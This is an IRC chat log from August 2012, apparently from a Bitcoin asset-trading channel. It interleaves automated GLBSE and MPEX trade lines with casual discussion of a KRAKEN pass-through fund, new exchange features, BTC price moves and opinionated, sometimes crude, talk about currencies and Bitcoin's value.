[GLBSE] [BIF.1YR.LOAN] 1 @ 0.96153845 BTC [+] Aug 20 06:22:53 [GLBSE] [OBSI.HRPT] 35 @ 0.101 = 3.535 BTC [+] Aug 20 06:23:34 [MPEX] [O.BTCUSD.P090T] 80 @ 0.07265773 = 5.8126 BTC [+] Aug 20 06:25:02 [MPEX] [O.BTCUSD.C130T] 24 @ 0.00174443 = 0.0419 BTC [-] Aug 20 06:25:17 [MPEX] [O.BTCUSD.C120T] 1 @ 0.00552883 BTC [-] Aug 20 06:25:18 [MPEX] [O.BTCUSD.C120T] 14 @ 0.00530488 = 0.0743 BTC [-] Aug 20 06:25:31 [MPEX] [O.BTCUSD.C150T] 14 @ 0.02187766 = 0.3063 BTC [-] Aug 20 06:26:43 [GLBSE] [NYAN] 3 @ 0.999 = 2.997 BTC [-] Aug 20 06:27:39 [GLBSE] [PUREMINING] 6 @ 0.13859996 = 0.8316 BTC [-] Aug 20 06:28:25 ;;ticker Aug 20 06:28:26 Best bid: 9.55, Best ask: 9.63407, Bid-ask spread: 0.08407, Last trade: 9.63407, 24 hour volume: 279204, 24 hour low: 7.58, 24 hour high: 11.00382 Aug 20 06:28:36 [GLBSE] [ZETA-MINING] 1 @ 0.18399 BTC [+] Aug 20 06:28:57 ;;bc,24hprc Aug 20 06:28:58 8.99 Aug 20 06:34:58 [MPEX] [F.GIGA.ETF] 2600 @ 0.00098405 = 2.5585 BTC [+] Aug 20 06:35:03 [MPEX] [O.BTCUSD.P100T] 46 @ 0.12994861 = 5.9776 BTC [-] Aug 20 06:43:20 [MPEX] [S.MPOE] 31200 @ 0.00037892 = 11.8223 BTC [-] Aug 20 06:43:22 [MPEX] [S.MPOE] 1086 @ 0.00037385 = 0.406 BTC [-] Aug 20 06:46:06 [MPEX] [S.MPOE] 12344 @ 0.00037164 = 4.5875 BTC [-] **** BEGIN LOGGING AT Mon Aug 20 06:48:50 2012 Aug 20 06:54:48 [GLBSE] [BBBB] 10 @ 0.00028 = 0.0028 BTC [+] Aug 20 06:56:42 [GLBSE] [BITNODES] 8 @ 0.243 = 1.944 BTC [+] Aug 20 07:05:39 [GLBSE] [OBSI.HRPT] 10 @ 0.101 = 1.01 BTC [+] Aug 20 07:05:41 [GLBSE] [ASICMINER] 2 @ 0.0999999 = 0.2 BTC [-] Aug 20 07:06:16 [GLBSE] [DMC] 9 @ 0.054 = 0.486 BTC [+] Aug 20 07:07:10 [GLBSE] [OBSI.HRPT] 6 @ 0.101 = 0.606 BTC [+] Aug 20 07:23:10 [MPEX] [F.GIGA.ETF] 10025 @ 0.00098405 = 9.8651 BTC [+] Aug 20 07:23:12 [MPEX] [F.GIGA.ETF] 875 @ 0.00099532 = 0.8709 BTC [+] Aug 20 07:29:50 [GLBSE] [NYAN.C] 2 @ 0.9499 = 1.8998 BTC [-] Aug 20 07:30:34 [GLBSE] [TYGRR.BOND-P] 8 @ 0.8589 = 6.8712 BTC [+] Aug 20 07:30:36 [GLBSE] [TYGRR.BOND-P] 2 @ 0.859 = 1.718 BTC [+] Aug 20 07:32:43 [GLBSE] [ASICMINER] 5 @ 0.0999999 = 0.5 BTC [-] Aug 20 07:34:29 [MPEX] [S.MPOE] 13500 @ 0.00039081 = 5.2759 BTC [+] Aug 20 07:34:44 [GLBSE] [ASICMINER] 22 @ 0.0999999 = 2.2 BTC [-] Aug 20 07:34:48 [GLBSE] [OBSI.HRPT] 2 @ 0.101 = 0.202 BTC [+] Aug 20 07:35:32 [GLBSE] [BLUECHIP] 1 @ 0.1 BTC Aug 20 07:42:34 [GLBSE] [TEEK.A] 50 @ 0.91 = 45.5 BTC [-] Aug 20 07:44:54 [GLBSE] [TYGRR.BOND-P] 2 @ 0.8599 = 1.7198 BTC [+] Aug 20 07:44:56 [GLBSE] [TYGRR.BOND-P] 4 @ 0.86 = 3.44 BTC [+] Aug 20 07:48:16 [GLBSE] [TYGRR.BOND-P] 7 @ 0.87 = 6.09 BTC [+] Aug 20 07:51:24 [GLBSE] [MMM] 4 @ 0.7 = 2.8 BTC [+] Aug 20 07:52:14 https://glbse.com/asset/view/KRAKEN IPO now live, passthru for Patrick Harnett's fund Aug 20 07:52:44 cool beans. Aug 20 07:52:46 he wasn't taking new deposits right??? Aug 20 07:52:53 Nope Aug 20 07:52:53 i thought he was. Aug 20 07:53:04 He limited it to 25 accounts for now Aug 20 07:53:13 o he did ? when ? Aug 20 07:53:14 so you are just doing what you have? Aug 20 07:53:28 On his thread Aug 20 07:53:28 because it sounded like he wasn't taking more btc or more accounts at the moment Aug 20 07:54:14 I already have the account + capacity Aug 20 07:54:30 [GLBSE] [KRAKEN] 1 @ 0.01 BTC Aug 20 07:54:49 (first!) Aug 20 07:55:02 Internet Commenters Aug 20 07:55:03 [GLBSE] [TYGRR.BOND-P] 1 @ 0.87 BTC [+] Aug 20 07:55:04 ... Aug 20 07:55:20 heh Aug 20 07:57:09 [GLBSE] [KRAKEN] 10 @ 0.01 = 0.1 BTC Aug 20 07:57:15 biggest Aug 20 07:57:54 haha Aug 20 07:58:22 you should announce it on the kraken thread Aug 20 07:58:29 there were lots of people clamoring for accounts there Aug 20 07:58:31 [GLBSE] [BLUECHIP] 25 @ 0.1 = 2.5 BTC Aug 20 07:58:47 I have 2 accounts Aug 20 07:58:48 take that Aug 20 07:58:51 [GLBSE] [BDT] 8 @ 1 = 8 BTC [-] Aug 20 07:58:56 why 2? Aug 20 07:59:08 one pays me weekly one reinvests Aug 20 07:59:11 ah Aug 20 07:59:12 im bothersome like that Aug 20 07:59:17 I thought there was no reinvesting Aug 20 07:59:28 [GLBSE] [FUTUREFUND] 20 @ 0.0001165 = 0.0023 BTC [-] Aug 20 07:59:31 it reinvests by default i think Aug 20 07:59:40 "Returns will be paid weekly (currently planning on Fridays) - no compounding or automatic reinvestment." Aug 20 08:00:02 well, i don't know what to say Aug 20 08:00:06 heh Aug 20 08:00:11 you got the hookup Aug 20 08:00:16 because i don't get paid, i just watch the balance go up :) Aug 20 08:00:36 and he gave me 5 free btc once Aug 20 08:00:40 [GLBSE] [FUTUREFUND] 100 @ 0.000117 = 0.0117 BTC [+] Aug 20 08:00:41 so take that too Aug 20 08:00:45 lol Aug 20 08:01:41 lol pretty sweet. Aug 20 08:01:55 i got an acct maybe a week ago, so i dunno. maybe it's new this closure. Aug 20 08:02:32 he said he would reasses after things settle down Aug 20 08:03:55 i imagine a lot of pressure from pirate Aug 20 08:07:16 [MPEX] [S.MPOE] 6100 @ 0.00039081 = 2.3839 BTC [+] Aug 20 08:07:17 [MPEX] [S.MPOE] 7128 @ 0.00039899 = 2.844 BTC [+] Aug 20 08:07:18 [MPEX] [S.MPOE] 966 @ 0.00040596 = 0.3922 BTC [+] Aug 20 08:07:19 [MPEX] [S.MPOE] 26606 @ 0.00040643 = 10.8135 BTC [+] Aug 20 08:08:45 BTC-Mining: your pass through has limited space right? Aug 20 08:08:55 or does it keep expanding? Aug 20 08:10:27 limited space Aug 20 08:10:34 [GLBSE] [NASTY] 1 @ 0.5999 BTC [+] Aug 20 08:10:55 Patrick said a 1000 BTC limit for now Aug 20 08:11:13 So that's what is available Aug 20 08:11:44 ok, thanks Aug 20 08:13:39 [GLBSE] [ARS] 150 @ 0.01 = 1.5 BTC [-] Aug 20 08:15:04 By default, accounts are compounding. For accounts greater than 10 BTC a weekly interest payout option is available. Aug 20 08:15:24 lol nevermind Aug 20 08:15:31 I guess we're not talking about the same thing? Aug 20 08:16:31 nope Aug 20 08:16:37 sorry about that Aug 20 08:16:51 hehe, np Aug 20 08:16:59 oh, that's starfish bcb Aug 20 08:18:03 yeah, i am out of the loop Aug 20 08:18:10 [GLBSE] [KRAKEN] 2500 @ 0.01 = 25 BTC Aug 20 08:18:12 time to buy more kraken Aug 20 08:19:03 [GLBSE] [KRAKEN] 49 @ 0.01 = 0.49 BTC Aug 20 08:21:11 BTC-Mining: are you going to put up a bid wall or anything to improve liquidity? Aug 20 08:21:32 Hmm... Aug 20 08:21:42 Maybe I could do that, yes Aug 20 08:21:50 I don't care, just wondering Aug 20 08:22:42 But probably not full price, I would need to get that covered with my own BTC Aug 20 08:23:11 I suppose maybe a bidwall at 95% would prevent price falling and give me a little bonus if someone wants out fast Aug 20 08:23:51 [GLBSE] [PUREMINING] 9 @ 0.1385996 = 1.2474 BTC [-] Aug 20 08:23:51 Or if you have 100 BTC worth, I can buy it back at full price on request I suppose Aug 20 08:24:18 nah, im only putting ina few btc... like 11 or so more Aug 20 08:24:46 It needs to be in 100 BTC increments however, I can only deposit/withdraw in such increments Aug 20 08:25:19 ok, well maybe when i get some btc back from other investments Aug 20 08:28:33 BTCHero well soon there will be the ability to bid w/o reserve i understand. Aug 20 08:29:41 what? do you mean like buy shares with btc that aren't in my account? I don't understand Aug 20 08:30:05 werll just put bids up Aug 20 08:30:20 oh, yeah that would be cool Aug 20 08:30:29 incase something sells buy this Aug 20 08:31:00 [GLBSE] [RSM] 10 @ 0.26 = 2.6 BTC [+] Aug 20 08:31:17 Well would allow to place as much bids as you wish based on your total amount as the max... Aug 20 08:31:36 So I guess that would greatly reduce lack of bids Aug 20 08:31:55 oh Aug 20 08:32:18 Well there should be like, off the book bids that don't go on until you get dividends or sell something Aug 20 08:32:42 [GLBSE] [ARS] 50 @ 0.01 = 0.5 BTC [-] Aug 20 08:33:39 Ah, that too maybe... Aug 20 08:33:55 Although I'd prefer the first option, the second being just for the heck of it Aug 20 08:34:04 I'm raraly able to get my bids filled Aug 20 08:34:10 rarely* Aug 20 08:34:29 yeah, if pirate does pay back glbse might light on fire Aug 20 08:36:02 [GLBSE] [PUREMINING] 2 @ 0.13869996 = 0.2774 BTC [+] Aug 20 08:37:08 your passthrough will probably sell out the moment pirate returns funds Aug 20 08:37:23 ...if it doesn't by then Aug 20 08:37:25 [GLBSE] [FPGAMINING] 1 @ 0.83 BTC [-] Aug 20 08:37:46 [GLBSE] [YABMC] 1 @ 0.1201 BTC [-] Aug 20 08:38:47 [GLBSE] [TYGRR.BOND-P] 12 @ 0.87 = 10.44 BTC [+] Aug 20 08:38:48 [GLBSE] [TYGRR.BOND-P] 2 @ 0.878 = 1.756 BTC [+] Aug 20 08:39:16 [GLBSE] [FPGAMINING] 1 @ 0.82 BTC [-] Aug 20 08:39:42 Eh, maybe Aug 20 08:39:56 Patrick can't handle the kind of money Pirate handled tho Aug 20 08:40:08 well, I mean the first 1000 BTC Aug 20 08:47:14 [GLBSE] [PUREMINING] 3 @ 0.13879997 = 0.4164 BTC [+] Aug 20 09:13:01 [GLBSE] [BITNODES] 1 @ 0.243 BTC [+] Aug 20 09:15:10 [MPEX] [S.MPOE] 4171 @ 0.00040464 = 1.6878 BTC [-] Aug 20 09:15:10 [MPEX] [S.MPOE] 179 @ 0.00040507 = 0.0725 BTC [+] Aug 20 09:27:50 [GLBSE] [GIGAMINING] 1 @ 1.035 BTC [+] Aug 20 09:31:21 [GLBSE] [NYAN.C] 2 @ 0.9499 = 1.8998 BTC [-] Aug 20 09:32:49 [GLBSE] [KRAKEN] 800 @ 0.01 = 8 BTC Aug 20 09:33:38 [GLBSE] [KRAKEN] 141 @ 0.01 = 1.41 BTC Aug 20 09:34:20 [GLBSE] [TYGRR.BOND-P] 2 @ 0.877 = 1.754 BTC [-] Aug 20 09:34:51 [GLBSE] [BTCMC] 2 @ 0.5499 = 1.0998 BTC [-] Aug 20 09:34:53 [GLBSE] [BTCMC] 1 @ 0.55 BTC [+] Aug 20 09:40:24 How do you buy SD shares? Aug 20 09:41:19 [MPEX] [F.GIGA.ETF] 10600 @ 0.0009904 = 10.4982 BTC [-] Aug 20 09:41:20 [MPEX] [F.GIGA.ETF] 3000 @ 0.00099532 = 2.986 BTC [+] Aug 20 09:41:30 btcoin you put an order in mpex. Aug 20 09:43:12 [GLBSE] [YARR] 4 @ 0.921 = 3.684 BTC [-] Aug 20 09:43:13 [GLBSE] [YARR] 2 @ 0.92000001 = 1.84 BTC [-] Aug 20 09:43:28 how do you do that? Confused Aug 20 09:43:57 http://polimedia.us/bitcoin/mpex.php maybe the faq helps ? Aug 20 09:43:59 [GLBSE] [FOO.PPPPT] 3 @ 0.85 = 2.55 BTC [+] Aug 20 09:44:48 [GLBSE] [NYAN.B] 150 @ 1 = 150 BTC [-] Aug 20 09:44:50 [GLBSE] [NYAN.A] 50 @ 1 = 50 BTC [-] Aug 20 09:45:03 How do I put an order in mpex for SD shares? Aug 20 09:45:20 [MPEX] [S.BVPS] 1500 @ 0.003801 = 5.7015 BTC [+] Aug 20 09:45:32 btcoin what do you normally use to connect, pympex ? Aug 20 09:45:34 [GLBSE] [TYGRR.BOND-P] 8 @ 0.877 = 7.016 BTC [-] Aug 20 09:46:29 [GLBSE] [TYGRR.BOND-P] 1 @ 0.877 BTC [-] Aug 20 09:47:19 I dont normally do anything, I have no idea about any of whats going on on that page Aug 20 09:47:35 a ok. well in that case you'll eiher have to read the faq/make an account Aug 20 09:47:42 or else find someone who is willing to broker for you. Aug 20 09:48:26 brendio used to do that i think, possibly smickles too. Aug 20 09:49:35 ok, i see FAQ, looks complicated. 20BTC account fee!? OK not doing that, just wanted to buy baybe 1000 shares only. flag Aug 20 09:49:58 yeah, it's a little more of a blue chip deal as it were. Aug 20 09:50:38 Yep, I mine and spend bitcoins haha, I dont know what blue chip even means :) Aug 20 09:51:22 blue chip are these elite companies that make up the nyse stock index. Aug 20 09:51:37 but anyway, i have a couple meetings to attend, catch you all in a little bit. **** BEGIN LOGGING AT Mon Aug 20 14:09:11 2012 Aug 20 14:09:11 [MPEX] [S.MPOE] 2578 @ 0.00040109 = 1.034 BTC [+] Aug 20 14:09:27 ah hello asseteers! Aug 20 14:10:43 'ello m8 Aug 20 14:11:54 mornin Aug 20 14:11:56 ;;ticker Aug 20 14:11:56 Best bid: 9.51, Best ask: 9.51989, Bid-ask spread: 0.00989, Last trade: 9.51, 24 hour volume: 282175, 24 hour low: 7.58, 24 hour high: 10.5 Aug 20 14:12:05 meh Aug 20 14:12:36 We'll be back over 10 by the end of the week Aug 20 14:12:39 It's a stick number Aug 20 14:12:42 sticky* Aug 20 14:13:31 [GLBSE] [KRAKEN] 1000 @ 0.01 = 10 BTC Aug 20 14:13:55 [GLBSE] [TYGRR.BOND-P] 5 @ 0.85 = 4.25 BTC [+] Aug 20 14:14:41 maybe we'll just sit right under it for the rest of the month. Aug 20 14:15:00 https://bitcointalk.org/index.php?topic=101902.20 so amusing to read the forum Aug 20 14:15:03 pickett_: ltc PPT was closed last week and everyone was paid. But this was really small ppt fund one of the zeros was closed and paid too but I think they had the BTC available Aug 20 14:15:09 I see no reason for it. We have that BitInstant credit card and Silk Road volume keeps going up. Aug 20 14:15:14 wah wah i can't do math, wah wah i have no money, wah wah take me into account wah wah Aug 20 14:15:28 Mircea: Markets are based on humans and their desires Aug 20 14:15:31 not arbitrary numbers Aug 20 14:15:33 if people hurt when they were being ridiculous we'd run out of drugs Aug 20 14:15:42 EmanuelDeOrtego absolutely. Aug 20 14:16:04 numbers are 15 to 20x forward PE for a successfull tech company that dominates its new niche Aug 20 14:16:09 i didn't make these up, it's what they are. Aug 20 14:16:50 Bitcoin is a little different than a tech company Aug 20 14:16:53 no. Aug 20 14:17:00 this personal excep[tionalism Aug 20 14:17:05 i can't ante 100 bucks but im an investor Aug 20 14:17:07 pffff. Aug 20 14:17:22 [GLBSE] [TYGRR.BOND-P] 30 @ 0.8 = 24 BTC [-] Aug 20 14:17:32 money. talks. internet personalities like the ex stock broker raising 12k nut here... they don't get a voice. Aug 20 14:17:52 Try 20k tied up here. Aug 20 14:17:59 not you, that schmuck eskimobob Aug 20 14:18:23 but at any rate, tech early stage investment is reserved for people with millions. Aug 20 14:18:32 10k, 50k... that buys a new car. Aug 20 14:18:43 maybe a new wife, if she's either well used up or else 2nd tier. Aug 20 14:18:49 does not buy a tech comp. Aug 20 14:19:11 You can't buy out Bitcoin without owning all the infrastructure. Aug 20 14:19:43 what do you think "infrastructure" is ? Aug 20 14:19:52 The miners and nodes. Aug 20 14:20:00 you think miners are infrastructure ? bs. miners are dust. anyone can mine. mpex is infrastructure. satoshi dice is infrastructure. Aug 20 14:20:08 the companies that make money no matter what are infrastructure. Aug 20 14:20:12 miners make a loss no matter what. Aug 20 14:20:31 I wish you luck with Bitcoin running off a single computer. Aug 20 14:21:01 What makes and destroys Bitcoin in the end is its network. Aug 20 14:21:20 As long as the network exists, a Bitcoin will be worth at least a nickel. Aug 20 14:22:39 wherther the network exists or not, that's no longer dubious. you understand this ? Aug 20 14:22:49 mining had value up until last year, when this point was still being established. Aug 20 14:22:51 mircea_popescu: wtf are you whining about now? Get over it and don't be a asshole. Aug 20 14:22:58 by now it's established. mining is no longer a point of interest. Aug 20 14:23:01 The man's fine. Aug 20 14:23:21 there's never not going to be mining. that's done. moving on. Aug 20 14:23:25 Anyways, there's 10 million dollars and a corporate interest away from a totally defunct Bitcoin network. Aug 20 14:23:35 not anymore. Aug 20 14:23:46 there's slowly growing interest FOR a surviving bitcoin network. Aug 20 14:24:00 If that's the case, then Bitcoin is undervalued. Aug 20 14:24:00 companies worth millions, like the couple on mpex, they have a very vested interest to fight it out. Aug 20 14:24:48 EmanuelDeOrtego bitcoin is indubitably undervalued, even at 15. Aug 20 14:24:53 LOL, you are delusional Aug 20 14:25:13 EskimoBob want to sue me ? Aug 20 14:25:25 EskimoBob: then why bother with Bitcoin then? Aug 20 14:26:29 mircea_popescu: i was laughing at your "companies worth millions, like the couple on mpex" Aug 20 14:26:48 He still has a point. Aug 20 14:26:55 Mt. Gox and BitInstant are very profitable. Aug 20 14:27:10 sure they are but this is another story Aug 20 14:27:36 https://glbse.com/asset/view/POLY.10.1 Someone buy. Aug 20 14:27:44 mt gox was claiming a loss iirc. Aug 20 14:27:59 the main difference here is this : mtgox and the pprocessors are all stuck with one foot in fiat. Aug 20 14:28:04 Earlier. They had at least $500k in revenue this month. Aug 20 14:28:09 neither mpoe or dice are. Aug 20 14:28:41 if the government of X decides to close their bank accounts, they are fucked. Aug 20 14:28:43 game over. Aug 20 14:29:05 [GLBSE] [KRAKEN] 2500 @ 0.01 = 25 BTC Aug 20 14:29:12 The only exchanges left after that would be SR dealers. Aug 20 14:29:17 Totally underground. Aug 20 14:29:25 [GLBSE] [GIGAMINING] 3 @ 1.0011 = 3.0033 BTC [-] Aug 20 14:29:55 [GLBSE] [TYGRR.BOND-B] 5 @ 0.1 = 0.5 BTC [-] Aug 20 14:30:33 and... the stock exchange. and.. satoshi dice. Aug 20 14:30:38 I think Gornick has written well what BTC financing is good for Aug 20 14:30:39 [GLBSE] [KRAKEN] 8 @ 0.01 = 0.08 BTC Aug 20 14:30:39 those are fully insulated. Aug 20 14:31:06 EskimoBob btc is not a companion for the bigger and better fiat. Aug 20 14:31:17 btc is the fiat killer. it is good for EVERYTHING and will do everything. Aug 20 14:31:22 fiat can have a crum, it's company scrip. Aug 20 14:31:38 relax now. No need to start foaming again Aug 20 14:32:59 All I know is when the Euro collapses this year Aug 20 14:33:05 Bitcoin is going to have a good time. Aug 20 14:33:33 i like good time Aug 20 14:34:07 interesting question is, who will benefit, if EUR collapses Aug 20 14:34:45 its quite clear who'll bemnefit. Aug 20 14:35:21 I think this is appropriate Aug 20 14:35:21 http://www.quickmeme.com/meme/3qk48w/ Aug 20 14:35:28 to the topic at hand Aug 20 14:35:33 BIH will win Aug 20 14:35:56 that was good one nefario Aug 20 14:36:08 Lord Rothschild has all his money against Euro. Aug 20 14:36:11 You better listen. Aug 20 14:36:39 should have said BAH (in english) Aug 20 14:36:43 i think it will be even funnier if USD bites the dust Aug 20 14:36:47 [GLBSE] [ASICMINER] 1 @ 0.0995 BTC [-] Aug 20 14:37:08 how long can your dear Fed's keep printing this funny money? Aug 20 14:37:33 [GLBSE] [GIGAMINING] 3 @ 1.0499 = 3.1497 BTC [+] Aug 20 14:37:35 As long as tax revenue comes in to pay off the interest on the lent money. Aug 20 14:37:45 If tax revenue declines, they flush the system and start over. Aug 20 14:38:02 EmanuelDeOrtego: lets hope this gasbag Rothschild keels over soon Aug 20 14:38:04 [GLBSE] [GIGAMINING] 1 @ 1.05 BTC [+] Aug 20 14:38:54 dollar might collapse first. Aug 20 14:39:17 I dunno, Euro unemployment is lower. Aug 20 14:39:46 I am no banker but I need some guarantee of revenue before putting the presses in full swing. Aug 20 14:39:50 ;; bids 9 Aug 20 14:39:51 There are currently 16832.221 bitcoins demanded at or over 9.0 USD, worth 155111.984223 USD in total. Aug 20 14:39:53 but I would need* Aug 20 14:40:19 dont get me wrong, I personally do not like the EUR idea at all. Especially if it's used in so many countries with so different cultures and financial backgrounds/history Aug 20 14:41:40 Yes, I agree. Aug 20 14:41:54 The elites are pissed off that it's not working. Aug 20 14:42:03 They want their easily controlled economic zones. Aug 20 14:42:17 A decentralized Europe is going to make things hard for them. Aug 20 14:42:34 [MPEX] [F.GIGA.ETF] 3326 @ 0.00098762 = 3.2848 BTC [-] Aug 20 14:42:46 you do not have to be too sharp to understand, it will never work. I guess those so called elitist are even bigger idiots than expected Aug 20 14:45:25 Great new everyone Aug 20 14:45:37 They have been in power for too long and they inbreed like crazy. Aug 20 14:45:39 no mroe avaliblity bs :D back to GLBSE V1 style Aug 20 14:45:58 DeaDTerra what ?! Aug 20 14:47:03 "they inbreed like crazy" <- :) Aug 20 14:47:29 No mroe avaliblity limits Aug 20 14:47:37 o o Aug 20 14:47:41 as long as you have the BTC in your account you can place the bid :D Aug 20 14:47:42 yeah nefario was saying. Aug 20 14:48:10 thats tomorrow Aug 20 14:48:56 did my new BFF DeaDTerra had good news? Aug 20 14:49:04 [GLBSE] [DMC] 2 @ 0.042 = 0.084 BTC [-] Aug 20 14:52:39 Nefario I love you <3 xD I have have longed for this feature for a while now Aug 20 14:53:12 whoa there, settle down Aug 20 14:53:22 as I mentioned in another thread Aug 20 14:53:26 we're getting options as well Aug 20 14:53:57 hahah I was joking though I like the feature a lot :) one of the things I was fond of from GLBSE V1 Aug 20 14:54:03 allowed me to stretch my capital a lot more. Aug 20 14:54:09 oh options Aug 20 14:54:12 for each asset? Aug 20 14:54:31 [GLBSE] [GIGAMINING] 4 @ 1.0011 = 4.0044 BTC [-] Aug 20 14:54:33 [GLBSE] [GIGAMINING] 5 @ 1.001 = 5.005 BTC [-] Aug 20 14:55:52 [GLBSE] [BDT] 3 @ 1.0001 = 3.0003 BTC [+] Aug 20 14:55:53 [GLBSE] [BDT] 1857 @ 1 = 1857 BTC [-] Aug 20 14:56:04 http://codinginmysleep.com/6-8-weeks-until-bitcoin-debitcredit-card-says-bitinstant/ Aug 20 14:56:35 DeaDTerra: yes Aug 20 14:56:40 kakobrekla pretty cool! Aug 20 14:56:47 you'll be able to make option for everything on GLBSE Aug 20 14:57:17 also will be able to put options up for sale for an asset, but still have that asset on the market for sale Aug 20 14:57:38 it's only when the option is bought that the asset will get put into reserve Aug 20 14:57:47 if the asset is sold before the option is bough Aug 20 14:57:49 bought Aug 20 14:57:56 then the option is cancelled Aug 20 14:58:11 next step after options is margin Aug 20 15:00:06 how do you cancel an option ? Aug 20 15:00:27 o nm i see what you mean. the offer is canceleld. Aug 20 15:00:50 yes Aug 20 15:02:14 what will be the difference between "options BETA" and "options live"? Aug 20 15:02:24 I mean, for an average user Aug 20 15:03:57 hm I see abuses from asset managers Aug 20 15:04:17 buying options using inside info, the releaseing it and cashing in on the change in the market Aug 20 15:05:43 tonikt: options beta is for me to test and people to have a look at (but won't actually work) Aug 20 15:05:48 options live is the real thing Aug 20 15:06:05 basically I'm saying I'll have something for people to look at by the end of the week Aug 20 15:06:37 ok. that's clear now Aug 20 15:12:08 http://i.imgur.com/B25gH.gif Aug 20 15:12:08 [GLBSE] [TYGRR.BOND-P] 2 @ 0.85 = 1.7 BTC [+] Aug 20 15:12:13 well thats an odd link Aug 20 15:13:36 [GLBSE] [TYGRR.BOND-P] 50 @ 0.79 = 39.5 BTC [-] Aug 20 15:15:06 [GLBSE] [TYGRR.BOND-P] 1 @ 0.78 BTC [-] Aug 20 15:15:07 [GLBSE] [TYGRR.BOND-P] 3 @ 0.77 = 2.31 BTC [-] Aug 20 15:15:09 [GLBSE] [TYGRR.BOND-P] 11 @ 0.761 = 8.371 BTC [-] Aug 20 15:16:13 [GLBSE] [KRAKEN] 2000 @ 0.01 = 20 BTC Aug 20 15:18:53 [GLBSE] [ASICMINER] 100 @ 0.0995 = 9.95 BTC [-] Aug 20 15:19:13 [GLBSE] [YARR] 5 @ 0.99 = 4.95 BTC [+] Aug 20 15:19:14 [GLBSE] [YARR] 1 @ 0.98 BTC [-] Aug 20 15:21:30 [MPEX] [F.GIGA.ETF] 15807 @ 0.00098116 = 15.5092 BTC [-] Aug 20 15:25:55 [GLBSE] [PAJKA.BOND] 9 @ 0.07899999 = 0.711 BTC [+] Aug 20 15:25:57 [GLBSE] [PAJKA.BOND] 1 @ 0.08 BTC [+] Aug 20 15:29:04 [GLBSE] [MMM] 3 @ 0.7 = 2.1 BTC [+] Aug 20 15:30:03 [GLBSE] [TYGRR.BOND-A] 2 @ 0.153 = 0.306 BTC [-] Aug 20 15:33:00 [MPEX] [S.MPOE] 19996 @ 0.00039938 = 7.986 BTC [-] Aug 20 15:34:34 [GLBSE] [ASICMINER] 11 @ 0.0995 = 1.0945 BTC [-] Aug 20 15:34:52 [GLBSE] [ASICMINER] 7 @ 0.0995 = 0.6965 BTC [-] Aug 20 15:37:09 [GLBSE] [HYDRO.BONDS] 3 @ 1.8001 = 5.4003 BTC [-] Aug 20 15:37:11 [GLBSE] [HYDRO.BONDS] 4 @ 1.8 = 7.2 BTC [-] Aug 20 15:42:11 [GLBSE] [ASICMINER] 5 @ 0.09949999 = 0.4975 BTC [-] Aug 20 15:42:26 [GLBSE] [GIGAMINING] 1 @ 1.04869999 BTC [+] Aug 20 15:43:09 https://glbse.com/asset/view/POLY.10.1 Aug 20 15:43:15 Someone buy plz Aug 20 15:44:14 [GLBSE] [GIGAMINING] 1 @ 1.04879999 BTC [+] Aug 20 15:44:18 what's that ? Aug 20 15:45:40 Every POLY.10.1 bond has a face value of (X/10) BTC, where $X USD is the last price at which BTC was traded on Mt. Gox. Aug 20 15:45:40 Bondholders have the right to redeem bonds for their face value. Aug 20 15:46:37 [GLBSE] [TYGRR.BOND-P] 3 @ 0.855 = 2.565 BTC [+] Aug 20 15:47:10 umm Aug 20 15:47:11 [GLBSE] [TYGRR.BOND-P] 9 @ 0.859 = 7.731 BTC [+] Aug 20 15:47:20 so if tghe last price is 100 usd i can redeem a bond for 10 btc ? Aug 20 15:49:52 Yep Aug 20 15:49:59 [GLBSE] [TYGRR.BOND-P] 11 @ 0.859 = 9.449 BTC [+] Aug 20 15:50:28 so sort of like a call option. Aug 20 15:50:40 Yep but less formal. Aug 20 15:50:45 yeah. Aug 20 15:50:49 [GLBSE] [NYAN.C] 4 @ 0.9499 = 3.7996 BTC [+] Aug 20 15:50:53 you could lose potentially a lot of btc, how do you cover ? Aug 20 15:51:47 [GLBSE] [ASICMINER] 4 @ 0.09949999 = 0.398 BTC [-] Aug 20 15:52:12 [GLBSE] [PUREMINING] 1 @ 0.13879996 BTC [-] Aug 20 15:52:24 mircea: I bought in at 5 so I am not too concerned Aug 20 15:52:58 o, i thought it's your asset. Aug 20 15:53:16 it's not you who buys that could lose a lot, is the asset owner, could end up oweing infinity btc. Aug 20 15:53:22 Nah. Meni said he doesn't plan on running this profitably. Aug 20 15:53:35 He has over 100,000 Bitcoins from what I have seen. Aug 20 15:53:58 Close ties with BitInstant in Israel Aug 20 15:54:04 aha Aug 20 16:00:01 [GLBSE] [TYGRR.BOT] 9 @ 0.91 = 8.19 BTC [-] Aug 20 16:03:34 At this rate, we're headed back to $10. So, Meni should buy them back soon. Aug 20 16:03:43 However, I would prefer them to be in other hands. ; ) Aug 20 16:03:52 [GLBSE] [SS] 1 @ 1.99 BTC [+] Aug 20 16:14:20 [GLBSE] [PUREMINING] 1 @ 0.13879996 BTC [-] Aug 20 16:14:22 [GLBSE] [PUREMINING] 19 @ 0.13879997 = 2.6372 BTC [+] Aug 20 16:17:29 [GLBSE] [TYGRR.BOND-P] 15 @ 0.801 = 12.015 BTC [-] Aug 20 16:17:31 [GLBSE] [TYGRR.BOND-P] 1 @ 0.8 BTC [-] Aug 20 16:17:43 [GLBSE] [BIF.BTCST.PPT] 16 @ 0.6 = 9.6 BTC [-] Aug 20 16:19:19 [GLBSE] [BIF.BTCST.PPT] 4 @ 0.6 = 2.4 BTC [-] Aug 20 16:19:44 I take it back Aug 20 16:19:56 Somebody (maybe pirate) is dumping again Aug 20 16:20:11 [GLBSE] [TYGRR.BOND-P] 4 @ 0.78 = 3.12 BTC [-] Aug 20 16:20:43 ;;ticker Aug 20 16:20:43 Best bid: 9.19981, Best ask: 9.2, Bid-ask spread: 0.00019, Last trade: 9.2, 24 hour volume: 264546, 24 hour low: 7.58, 24 hour high: 10.5 Aug 20 16:22:05 [GLBSE] [BITBOND] 2 @ 0.3799 = 0.7598 BTC [+] Aug 20 16:22:36 Another dump Aug 20 16:23:24 ;;bids 8 Aug 20 16:23:24 I doubt we can go too far into the eights but we will see Aug 20 16:23:25 There are currently 27376.372 bitcoins demanded at or over 8.0 USD, worth 229995.472854 USD in total. Aug 20 16:24:03 We are going to stablize at this price for awhile. Aug 20 16:27:06 We're in the eights now Aug 20 16:29:09 ;;ticker Aug 20 16:29:09 Best bid: 8.99987, Best ask: 9, Bid-ask spread: 0.00013, Last trade: 9, 24 hour volume: 267959, 24 hour low: 7.58, 24 hour high: 10.5 Aug 20 16:30:44 The bid section really doesn't look bad though Aug 20 16:31:05 I am surprised how tough the market is Aug 20 16:31:21 any news form Goat or any other PPT guy? Aug 20 